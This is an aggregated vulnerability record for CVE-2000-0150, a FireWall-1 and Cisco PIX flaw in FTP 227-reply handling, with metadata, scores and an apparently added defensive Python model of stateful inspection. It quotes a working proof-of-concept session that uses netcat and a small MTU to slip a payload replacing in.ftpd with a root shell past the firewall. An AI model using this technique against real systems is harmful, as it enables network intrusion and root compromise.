ID

VAR-200002-0050


CVE

CVE-2000-0150


TITLE

Multiple vendors' firewalls do not adequately keep state of FTP traffic

Trust: 0.8

sources: CERT/CC: VU#328867

DESCRIPTION

Check Point Firewall-1 allows remote attackers to bypass port access restrictions on an FTP server by forcing it to send malicious packets that Firewall-1 misinterprets as a valid 227 response to a client's PASV attempt.

Firewalls and other systems that inspect FTP application-layer traffic may not adequately maintain the state of FTP commands and responses. As a result, an attacker could establish arbitrary TCP connections to FTP servers or clients located behind a vulnerable firewall.

A vulnerability exists in the way that Check Point FireWall-1 handles packets sent from an FTP server to a connecting client. An attacker may be able to exploit this weakness to establish connections to any machine residing behind a FireWall-1 machine, or to send packets into a network protected by a FireWall-1. FireWall-1 monitors packets from the FTP server to the client, looking for the string "227 " at the beginning of each packet. If FW-1 finds a packet which matches this criterion, it extracts the destination address and port, verifies that the specified destination address matches the source of the packet, and allows TCP connections through the firewall to that IP and port. In FireWall-1 4.0, these TCP connections can only send data in one direction; under FireWall-1 3.0 and prior, this limitation does not exist. In addition, under FW-1 4.0 the data cannot be travelling to a port that is defined in FW-1's list of well-known TCP services.

The details of the vulnerability posted by John McDonald <jm@dataprotect.com> contained the following example:

"Here is an example of an attack based on this technique. There is a FireWall-1 machine between gumpe and the 172.16.0.2 server, which only permits incoming FTP connections. 172.16.0.2 is a default Solaris 2.6 install, with the Tooltalk Database vulnerability. We send the datagram directly to the service's TCP port, in spite of this port being blocked by the firewall. Note that since there is no response expected, the one-way restriction doesn't affect this attack. All of our testing was done on a Nokia IPSO machine running FW-1 version 4.0.SP-4.

[root@gumpe /root]# strings hackfile
localhost
""""3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f /usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd
[root@gumpe /root]# /sbin/ifconfig eth0 mtu 100
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[1]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open
sent 80, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[2]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open
sent 1168, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open
id
uid=0(root) gid=0(root)

There is an easier way to perform a similar attack on this setup, since the default Solaris FTP daemon allows a bounce attack, but this should suffice to demonstrate the potential severity of this problem."

In summary, if an FTP server behind a FireWall-1 firewall is reachable from the outside world, an attacker may be able to open TCP connections to certain ports on that FTP machine. This vulnerability is not specific to Firewall-1: it has been demonstrated that the PIX firewall, from Cisco, is also vulnerable. Check Point Firewall-1 is vulnerable.

Trust: 1.98

sources: NVD: CVE-2000-0150 // CERT/CC: VU#328867 // BID: 979 // VULHUB: VHN-1729
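The description above contrasts per-packet matching on the string "227 " with a firewall that actually keeps the state of FTP commands and replies. The Python below is an added, illustrative model of that difference; it is not code from Check Point, Cisco or any source listed on this record. It places the packet-oriented check beside a line-reassembling, command-tracking inspector and feeds both the kind of split reply the description discusses (a 500 error echoing client input, cut by a small MTU so that one segment begins with "227 ("). The segment contents, the 1023 port cutoff, and all class and function names are constructed assumptions for the example.

```python
"""Stateful versus per-packet handling of FTP 227 (PASV) replies.

Illustrative example only (not vendor code). Models the weakness described
in the advisory: a check that trusts any server->client packet starting with
"227 " can be driven by server output that merely echoes client input.
"""
import re
from dataclasses import dataclass, field

# RFC 959 passive reply: "227 <text> (h1,h2,h3,h4,p1,p2)"
PASV_REPLY = re.compile(
    r"^227 [^\r\n]*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"
)
WELL_KNOWN_PORT_MAX = 1023  # assumed cutoff: never open a pinhole to a service port


def parse_227(line: str):
    """Return (host, port) from a complete 227 reply line, or None."""
    m = PASV_REPLY.match(line)
    if m is None:
        return None
    octets = [int(x) for x in m.groups()]
    if any(o > 255 for o in octets):
        return None
    host = ".".join(str(o) for o in octets[:4])
    port = octets[4] * 256 + octets[5]
    return host, port


def naive_pinhole(server_ip: str, packet: bytes):
    """Per-packet check in the style the advisory describes: any packet that
    begins with '227 ' and names the server's own address opens a pinhole.
    There is no command state and no reassembly of reply lines."""
    text = packet.decode("latin-1")
    if not text.startswith("227 "):
        return None
    parsed = parse_227(text)
    if parsed is None or parsed[0] != server_ip:
        return None
    return parsed


@dataclass
class StatefulFtpInspector:
    """Tracks the control channel in both directions and only honours a 227
    that is a complete reply line answering a client PASV command."""
    server_ip: str
    _client_buf: bytes = b""
    _server_buf: bytes = b""
    _pasv_pending: bool = False
    pinholes: list = field(default_factory=list)

    def client_to_server(self, data: bytes) -> None:
        """Reassemble client command lines; remember whether the most recent
        command was PASV, the only command a 227 may legitimately answer."""
        self._client_buf += data
        while b"\r\n" in self._client_buf:
            line, _, self._client_buf = self._client_buf.partition(b"\r\n")
            verb = line.split(b" ", 1)[0].upper()
            self._pasv_pending = verb == b"PASV"

    def server_to_client(self, data: bytes) -> list:
        """Reassemble server reply lines; return pinholes opened by this segment.
        A '227 (...)' embedded inside a longer reply (e.g. a 500 error echoing
        client input) never matches, because only whole lines are parsed, and
        any 227 arriving without an outstanding PASV is ignored."""
        opened = []
        self._server_buf += data
        while b"\r\n" in self._server_buf:
            line, _, self._server_buf = self._server_buf.partition(b"\r\n")
            text = line.decode("latin-1")
            if not re.match(r"^\d{3}[ -]", text):
                continue  # continuation line of a multi-line reply
            if not self._pasv_pending:
                continue  # no PASV outstanding: nothing to open
            if text[3] == "-":
                continue  # multi-line reply: wait for its final line
            self._pasv_pending = False  # this reply completes the PASV exchange
            parsed = parse_227(text)
            if parsed is None:
                continue
            host, port = parsed
            if host != self.server_ip or port <= WELL_KNOWN_PORT_MAX:
                continue  # foreign address or well-known service port
            self.pinholes.append((host, port))
            opened.append((host, port))
        return opened


SERVER = "172.16.0.2"
# Constructed segments: the server's 500 error echoes the client's input and a
# small MTU splits the reply so the second segment starts with "227 (".
ECHO = "227 (172,16,0,2,128,7)"
seg1 = b"500 '" + b"." * 43
seg2 = (ECHO + "." * 43 + "': command not understood.\r\n").encode()


def demo_attack_segments():
    """Naive check opens 32775; the stateful inspector opens nothing."""
    naive = naive_pinhole(SERVER, seg2)
    insp = StatefulFtpInspector(SERVER)
    insp.client_to_server(b"USER anonymous\r\n")
    insp.client_to_server(b"." * 43 + ECHO.encode() + b"." * 43 + b"\r\n")
    opened = insp.server_to_client(seg1) + insp.server_to_client(seg2)
    return naive, opened


def demo_legitimate_pasv():
    """A real PASV/227 exchange still opens the data port."""
    insp = StatefulFtpInspector(SERVER)
    insp.client_to_server(b"PASV\r\n")
    return insp.server_to_client(b"227 Entering Passive Mode (172,16,0,2,128,7).\r\n")


def demo_rejected_replies():
    """A 227 naming another host, or a well-known port, is refused."""
    insp = StatefulFtpInspector(SERVER)
    results = []
    for reply in (b"227 (10,0,0,1,128,7)\r\n", b"227 (172,16,0,2,0,23)\r\n"):
        insp.client_to_server(b"PASV\r\n")
        results.append(insp.server_to_client(reply))
    return results


if __name__ == "__main__":
    print("split 500 reply  :", demo_attack_segments())
    print("legitimate PASV  :", demo_legitimate_pasv())
    print("rejected replies :", demo_rejected_replies())
```

The inspector applies the three checks the description implies a state-keeping firewall needs: the 227 must be a whole reply line rather than the start of an arbitrary packet, it must answer a PASV the client actually sent, and the address and port it names must belong to the server and fall outside the well-known service range.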

AFFECTED PRODUCTS

vendor: checkpoint | model: firewall-1 | scope: eq | version: 4.0

Trust: 1.6

vendor: checkpoint | model: firewall-1 | scope: eq | version: 3.0

Trust: 1.6

vendor: cisco | model: pix firewall software | scope: eq | version: 4.2(2)

Trust: 1.0

vendor: cisco | model: pix firewall software | scope: eq | version: 4.1(6)

Trust: 1.0

vendor: cisco | model: pix firewall software | scope: eq | version: 4.4(4)

Trust: 1.0

vendor: cisco | model: pix firewall software | scope: eq | version: 5.0

Trust: 1.0

vendor: cisco | model: pix firewall software | scope: eq | version: 4.1(6b)

Trust: 1.0

vendor: cisco | model: pix firewall software | scope: eq | version: 4.3

Trust: 1.0

vendor: cisco | model: pix firewall software | scope: eq | version: 4.2(1)

Trust: 1.0

vendor: ip filter | model: - | scope: - | version: -

Trust: 0.8

vendor: netbsd | model: - | scope: - | version: -

Trust: 0.8

vendor: watchguard | model: - | scope: - | version: -

Trust: 0.8

vendor: cisco | model: pix firewall | scope: eq | version: 5.0

Trust: 0.3

vendor: cisco | model: pix firewall | scope: eq | version: 4.4(4)

Trust: 0.3

vendor: cisco | model: pix firewall | scope: eq | version: 4.3

Trust: 0.3

vendor: cisco | model: pix firewall | scope: eq | version: 4.2.2

Trust: 0.3

vendor: cisco | model: pix firewall | scope: eq | version: 4.2.1

Trust: 0.3

vendor: cisco | model: pix firewall b | scope: eq | version: 4.1.6

Trust: 0.3

vendor: cisco | model: pix firewall | scope: eq | version: 4.1.6

Trust: 0.3

vendor: check | model: point software firewall-1 | scope: eq | version: 4.0

Trust: 0.3

vendor: check | model: point software firewall-1 | scope: eq | version: 3.0

Trust: 0.3

vendor: cisco | model: pix firewall | scope: ne | version: 5.1

Trust: 0.3

sources: CERT/CC: VU#328867 // BID: 979 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2000-0150
value: HIGH

Trust: 1.0

CARNEGIE MELLON: VU#328867
value: 24.10

Trust: 0.8

CNNVD: CNNVD-200002-044
value: HIGH

Trust: 0.6

VULHUB: VHN-1729
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2000-0150
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.0

VULHUB: VHN-1729
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CERT/CC: VU#328867 // VULHUB: VHN-1729 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2000-0150

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-200002-044

TYPE

Design Error

Trust: 0.9

sources: BID: 979 // CNNVD: CNNVD-200002-044

EXTERNAL IDS

db: CERT/CC | id: VU#328867

Trust: 2.5

db: BID | id: 979

Trust: 2.0

db: NVD | id: CVE-2000-0150

Trust: 1.7

db: OSVDB | id: 4417

Trust: 1.7

db: CNNVD | id: CNNVD-200002-044

Trust: 0.6

db: VULHUB | id: VHN-1729

Trust: 0.1

sources: CERT/CC: VU#328867 // VULHUB: VHN-1729 // BID: 979 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

REFERENCES

url:http://www.securityfocus.com/bid/979

Trust: 1.7

url:http://www.kb.cert.org/vuls/id/328867

Trust: 1.7

url:http://www.osvdb.org/4417

Trust: 1.7

url:http://www.ietf.org/rfc/rfc959.txt

Trust: 0.8

url:http://www.ietf.org/rfc/rfc2581.txt

Trust: 0.8

url:http://online.securityfocus.com/archive/1/47688/2000-02-12/2000-02-18/1

Trust: 0.8

url:http://online.securityfocus.com/archive/82/45758/2000-02-08/2000-02-14/1

Trust: 0.8

url:http://www.checkpoint.com/techsupport/

Trust: 0.3

url:http://www.cisco.com/warp/public/707/sec_incident_response.shtml

Trust: 0.3

url: -

Trust: 0.1

sources: CERT/CC: VU#328867 // VULHUB: VHN-1729 // BID: 979 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

CREDITS

This vulnerability was posted to the Bugtraq mailing list on February 9, 2000 by John McDonald <jm@dataprotect.com>. The post described work by both McDonald and Thomas Lopatic <tl@dataprotect.com>.

Trust: 0.9

sources: BID: 979 // CNNVD: CNNVD-200002-044

SOURCES

db: CERT/CC | id: VU#328867
db: VULHUB | id: VHN-1729
db: BID | id: 979
db: CNNVD | id: CNNVD-200002-044
db: NVD | id: CVE-2000-0150

LAST UPDATE DATE

2024-08-14T14:29:35.812000+00:00


SOURCES UPDATE DATE

db: CERT/CC | id: VU#328867 | date: 2003-03-07T00:00:00
db: VULHUB | id: VHN-1729 | date: 2018-10-30T00:00:00
db: BID | id: 979 | date: 2000-02-09T00:00:00
db: CNNVD | id: CNNVD-200002-044 | date: 2006-11-16T00:00:00
db: NVD | id: CVE-2000-0150 | date: 2018-10-30T16:26:17.700

SOURCES RELEASE DATE

db: CERT/CC | id: VU#328867 | date: 2002-10-08T00:00:00
db: VULHUB | id: VHN-1729 | date: 2000-02-12T00:00:00
db: BID | id: 979 | date: 2000-02-09T00:00:00
db: CNNVD | id: CNNVD-200002-044 | date: 2000-02-12T00:00:00
db: NVD | id: CVE-2000-0150 | date: 2000-02-12T05:00:00